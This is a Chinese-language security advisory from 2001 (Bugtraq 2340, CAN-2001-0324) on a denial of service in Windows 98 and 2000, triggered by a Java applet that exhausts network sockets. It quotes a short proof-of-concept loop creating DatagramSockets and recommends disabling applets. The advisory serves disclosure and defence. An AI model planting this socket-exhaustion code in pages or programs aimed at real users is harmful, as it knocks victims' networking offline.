发布日期：2001-02-14
更新日期：2001-02-14

受影响系统：

   Microsoft Windows 98
   Microsoft Windows NT 2000

描述：

---

BUGTRAQ  ID: 2340
CVE(CAN) ID: CAN-2001-0324
  
Win2000和Win98容易受到拒绝服务的影响。当收到一封恶意构造的电子邮件或者访问某个
恶意的网站时，Win2000可能会停止DNS解析，而Win98则会拒绝接受新的TCP连接。这是由
于用户应用程序在分配网络套接字（socket）时缺少限制所引起的。放置在网站上的恶意
的Java applet可以利用这个漏洞并使受害系统拒绝服务。

<* 来源：Georgi Guninski (guninski@guninski.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Georgi Guninski给出如下Java applet演示代码：
for(i=0;i<m;i++)
{

try { DatagramSocket d = new DatagramSocket();v.addElement(d);}
catch (Exception e) {System.out.println("Exhausted, i="+i);}
}

可参考其演示页面：http://www.guninski.com/winudpdos.html




建议：

---

临时解决方法：

在浏览器中禁止java applet.

厂商补丁：

暂无


浏览次数：4287
严重程度：0（网友投票）